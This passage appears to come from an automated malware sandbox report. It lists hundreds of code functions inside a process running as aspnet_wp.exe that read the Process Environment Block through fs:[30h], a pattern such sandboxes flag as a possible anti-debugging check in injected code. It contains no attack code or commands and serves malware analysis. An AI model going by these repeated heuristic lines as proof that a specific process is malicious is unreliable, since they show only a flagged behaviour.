Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0558F453 mov eax, dword ptr fs:[00000030h]	5_2_0558F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DB440 mov eax, dword ptr fs:[00000030h]	5_2_054DB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DB440 mov eax, dword ptr fs:[00000030h]	5_2_054DB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DB440 mov eax, dword ptr fs:[00000030h]	5_2_054DB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DB440 mov eax, dword ptr fs:[00000030h]	5_2_054DB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DB440 mov eax, dword ptr fs:[00000030h]	5_2_054DB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DB440 mov eax, dword ptr fs:[00000030h]	5_2_054DB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C645D mov eax, dword ptr fs:[00000030h]	5_2_054C645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550E443 mov eax, dword ptr fs:[00000030h]	5_2_0550E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550E443 mov eax, dword ptr fs:[00000030h]	5_2_0550E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550E443 mov eax, dword ptr fs:[00000030h]	5_2_0550E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550E443 mov eax, dword ptr fs:[00000030h]	5_2_0550E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550E443 mov eax, dword ptr fs:[00000030h]	5_2_0550E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550E443 mov eax, dword ptr fs:[00000030h]	5_2_0550E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550E443 mov eax, dword ptr fs:[00000030h]	5_2_0550E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550E443 mov eax, dword ptr fs:[00000030h]	5_2_0550E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F245A mov eax, dword ptr fs:[00000030h]	5_2_054F245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A547F mov eax, dword ptr fs:[00000030h]	5_2_055A547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D1460 mov eax, dword ptr fs:[00000030h]	5_2_054D1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D1460 mov eax, dword ptr fs:[00000030h]	5_2_054D1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D1460 mov eax, dword ptr fs:[00000030h]	5_2_054D1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D1460 mov eax, dword ptr fs:[00000030h]	5_2_054D1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D1460 mov eax, dword ptr fs:[00000030h]	5_2_054D1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EF460 mov eax, dword ptr fs:[00000030h]	5_2_054EF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EF460 mov eax, dword ptr fs:[00000030h]	5_2_054EF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EF460 mov eax, dword ptr fs:[00000030h]	5_2_054EF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EF460 mov eax, dword ptr fs:[00000030h]	5_2_054EF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EF460 mov eax, dword ptr fs:[00000030h]	5_2_054EF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EF460 mov eax, dword ptr fs:[00000030h]	5_2_054EF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555C460 mov ecx, dword ptr fs:[00000030h]	5_2_0555C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FA470 mov eax, dword ptr fs:[00000030h]	5_2_054FA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FA470 mov eax, dword ptr fs:[00000030h]	5_2_054FA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FA470 mov eax, dword ptr fs:[00000030h]	5_2_054FA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F340D mov eax, dword ptr fs:[00000030h]	5_2_054F340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05557410 mov eax, dword ptr fs:[00000030h]	5_2_05557410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05508402 mov eax, dword ptr fs:[00000030h]	5_2_05508402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05508402 mov eax, dword ptr fs:[00000030h]	5_2_05508402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05508402 mov eax, dword ptr fs:[00000030h]	5_2_05508402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CC427 mov eax, dword ptr fs:[00000030h]	5_2_054CC427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CE420 mov eax, dword ptr fs:[00000030h]	5_2_054CE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CE420 mov eax, dword ptr fs:[00000030h]	5_2_054CE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CE420 mov eax, dword ptr fs:[00000030h]	5_2_054CE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05556420 mov eax, dword ptr fs:[00000030h]	5_2_05556420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05556420 mov eax, dword ptr fs:[00000030h]	5_2_05556420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05556420 mov eax, dword ptr fs:[00000030h]	5_2_05556420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05556420 mov eax, dword ptr fs:[00000030h]	5_2_05556420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05556420 mov eax, dword ptr fs:[00000030h]	5_2_05556420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05556420 mov eax, dword ptr fs:[00000030h]	5_2_05556420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05556420 mov eax, dword ptr fs:[00000030h]	5_2_05556420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A54DB mov eax, dword ptr fs:[00000030h]	5_2_055A54DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D04E5 mov ecx, dword ptr fs:[00000030h]	5_2_054D04E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055794E0 mov eax, dword ptr fs:[00000030h]	5_2_055794E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D9486 mov eax, dword ptr fs:[00000030h]	5_2_054D9486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D9486 mov eax, dword ptr fs:[00000030h]	5_2_054D9486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CB480 mov eax, dword ptr fs:[00000030h]	5_2_054CB480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055034B0 mov eax, dword ptr fs:[00000030h]	5_2_055034B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055044B0 mov ecx, dword ptr fs:[00000030h]	5_2_055044B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555A4B0 mov eax, dword ptr fs:[00000030h]	5_2_0555A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D64AB mov eax, dword ptr fs:[00000030h]	5_2_054D64AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05554755 mov eax, dword ptr fs:[00000030h]	5_2_05554755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512750 mov eax, dword ptr fs:[00000030h]	5_2_05512750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512750 mov eax, dword ptr fs:[00000030h]	5_2_05512750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555E75D mov eax, dword ptr fs:[00000030h]	5_2_0555E75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E3740 mov eax, dword ptr fs:[00000030h]	5_2_054E3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E3740 mov eax, dword ptr fs:[00000030h]	5_2_054E3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E3740 mov eax, dword ptr fs:[00000030h]	5_2_054E3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A3749 mov eax, dword ptr fs:[00000030h]	5_2_055A3749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D0750 mov eax, dword ptr fs:[00000030h]	5_2_054D0750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550674D mov esi, dword ptr fs:[00000030h]	5_2_0550674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550674D mov eax, dword ptr fs:[00000030h]	5_2_0550674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550674D mov eax, dword ptr fs:[00000030h]	5_2_0550674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CB765 mov eax, dword ptr fs:[00000030h]	5_2_054CB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CB765 mov eax, dword ptr fs:[00000030h]	5_2_054CB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CB765 mov eax, dword ptr fs:[00000030h]	5_2_054CB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CB765 mov eax, dword ptr fs:[00000030h]	5_2_054CB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D8770 mov eax, dword ptr fs:[00000030h]	5_2_054D8770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770 mov eax, dword ptr fs:[00000030h]	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770 mov eax, dword ptr fs:[00000030h]	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770 mov eax, dword ptr fs:[00000030h]	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770 mov eax, dword ptr fs:[00000030h]	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770 mov eax, dword ptr fs:[00000030h]	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770 mov eax, dword ptr fs:[00000030h]	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770 mov eax, dword ptr fs:[00000030h]	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770 mov eax, dword ptr fs:[00000030h]	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770 mov eax, dword ptr fs:[00000030h]	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770 mov eax, dword ptr fs:[00000030h]	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770 mov eax, dword ptr fs:[00000030h]	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E0770 mov eax, dword ptr fs:[00000030h]	5_2_054E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05500710 mov eax, dword ptr fs:[00000030h]	5_2_05500710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D7703 mov eax, dword ptr fs:[00000030h]	5_2_054D7703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D5702 mov eax, dword ptr fs:[00000030h]	5_2_054D5702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D5702 mov eax, dword ptr fs:[00000030h]	5_2_054D5702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550F71F mov eax, dword ptr fs:[00000030h]	5_2_0550F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550F71F mov eax, dword ptr fs:[00000030h]	5_2_0550F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550C700 mov eax, dword ptr fs:[00000030h]	5_2_0550C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D0710 mov eax, dword ptr fs:[00000030h]	5_2_054D0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554C730 mov eax, dword ptr fs:[00000030h]	5_2_0554C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05505734 mov eax, dword ptr fs:[00000030h]	5_2_05505734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055AB73C mov eax, dword ptr fs:[00000030h]	5_2_055AB73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055AB73C mov eax, dword ptr fs:[00000030h]	5_2_055AB73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055AB73C mov eax, dword ptr fs:[00000030h]	5_2_055AB73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055AB73C mov eax, dword ptr fs:[00000030h]	5_2_055AB73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550273C mov eax, dword ptr fs:[00000030h]	5_2_0550273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550273C mov ecx, dword ptr fs:[00000030h]	5_2_0550273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550273C mov eax, dword ptr fs:[00000030h]	5_2_0550273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D3720 mov eax, dword ptr fs:[00000030h]	5_2_054D3720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EF720 mov eax, dword ptr fs:[00000030h]	5_2_054EF720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EF720 mov eax, dword ptr fs:[00000030h]	5_2_054EF720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EF720 mov eax, dword ptr fs:[00000030h]	5_2_054EF720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550C720 mov eax, dword ptr fs:[00000030h]	5_2_0550C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550C720 mov eax, dword ptr fs:[00000030h]	5_2_0550C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559972B mov eax, dword ptr fs:[00000030h]	5_2_0559972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0558F72E mov eax, dword ptr fs:[00000030h]	5_2_0558F72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D973A mov eax, dword ptr fs:[00000030h]	5_2_054D973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D973A mov eax, dword ptr fs:[00000030h]	5_2_054D973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C9730 mov eax, dword ptr fs:[00000030h]	5_2_054C9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C9730 mov eax, dword ptr fs:[00000030h]	5_2_054C9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DC7C0 mov eax, dword ptr fs:[00000030h]	5_2_054DC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D57C0 mov eax, dword ptr fs:[00000030h]	5_2_054D57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D57C0 mov eax, dword ptr fs:[00000030h]	5_2_054D57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D57C0 mov eax, dword ptr fs:[00000030h]	5_2_054D57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055507C3 mov eax, dword ptr fs:[00000030h]	5_2_055507C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F27ED mov eax, dword ptr fs:[00000030h]	5_2_054F27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F27ED mov eax, dword ptr fs:[00000030h]	5_2_054F27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F27ED mov eax, dword ptr fs:[00000030h]	5_2_054F27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DD7E0 mov ecx, dword ptr fs:[00000030h]	5_2_054DD7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555E7E1 mov eax, dword ptr fs:[00000030h]	5_2_0555E7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D47FB mov eax, dword ptr fs:[00000030h]	5_2_054D47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D47FB mov eax, dword ptr fs:[00000030h]	5_2_054D47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0558F78A mov eax, dword ptr fs:[00000030h]	5_2_0558F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D07AF mov eax, dword ptr fs:[00000030h]	5_2_054D07AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A37B6 mov eax, dword ptr fs:[00000030h]	5_2_055A37B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF7BA mov eax, dword ptr fs:[00000030h]	5_2_054CF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF7BA mov eax, dword ptr fs:[00000030h]	5_2_054CF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF7BA mov eax, dword ptr fs:[00000030h]	5_2_054CF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF7BA mov eax, dword ptr fs:[00000030h]	5_2_054CF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF7BA mov eax, dword ptr fs:[00000030h]	5_2_054CF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF7BA mov eax, dword ptr fs:[00000030h]	5_2_054CF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF7BA mov eax, dword ptr fs:[00000030h]	5_2_054CF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF7BA mov eax, dword ptr fs:[00000030h]	5_2_054CF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF7BA mov eax, dword ptr fs:[00000030h]	5_2_054CF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555F7AF mov eax, dword ptr fs:[00000030h]	5_2_0555F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555F7AF mov eax, dword ptr fs:[00000030h]	5_2_0555F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555F7AF mov eax, dword ptr fs:[00000030h]	5_2_0555F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555F7AF mov eax, dword ptr fs:[00000030h]	5_2_0555F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555F7AF mov eax, dword ptr fs:[00000030h]	5_2_0555F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055597A9 mov eax, dword ptr fs:[00000030h]	5_2_055597A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FD7B0 mov eax, dword ptr fs:[00000030h]	5_2_054FD7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EC640 mov eax, dword ptr fs:[00000030h]	5_2_054EC640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05502674 mov eax, dword ptr fs:[00000030h]	5_2_05502674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550A660 mov eax, dword ptr fs:[00000030h]	5_2_0550A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550A660 mov eax, dword ptr fs:[00000030h]	5_2_0550A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05509660 mov eax, dword ptr fs:[00000030h]	5_2_05509660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05509660 mov eax, dword ptr fs:[00000030h]	5_2_05509660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559866E mov eax, dword ptr fs:[00000030h]	5_2_0559866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559866E mov eax, dword ptr fs:[00000030h]	5_2_0559866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E260B mov eax, dword ptr fs:[00000030h]	5_2_054E260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E260B mov eax, dword ptr fs:[00000030h]	5_2_054E260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E260B mov eax, dword ptr fs:[00000030h]	5_2_054E260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E260B mov eax, dword ptr fs:[00000030h]	5_2_054E260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E260B mov eax, dword ptr fs:[00000030h]	5_2_054E260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E260B mov eax, dword ptr fs:[00000030h]	5_2_054E260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E260B mov eax, dword ptr fs:[00000030h]	5_2_054E260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05512619 mov eax, dword ptr fs:[00000030h]	5_2_05512619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550F603 mov eax, dword ptr fs:[00000030h]	5_2_0550F603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05501607 mov eax, dword ptr fs:[00000030h]	5_2_05501607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D3616 mov eax, dword ptr fs:[00000030h]	5_2_054D3616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D3616 mov eax, dword ptr fs:[00000030h]	5_2_054D3616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554E609 mov eax, dword ptr fs:[00000030h]	5_2_0554E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D262C mov eax, dword ptr fs:[00000030h]	5_2_054D262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EE627 mov eax, dword ptr fs:[00000030h]	5_2_054EE627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF626 mov eax, dword ptr fs:[00000030h]	5_2_054CF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF626 mov eax, dword ptr fs:[00000030h]	5_2_054CF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF626 mov eax, dword ptr fs:[00000030h]	5_2_054CF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF626 mov eax, dword ptr fs:[00000030h]	5_2_054CF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF626 mov eax, dword ptr fs:[00000030h]	5_2_054CF626
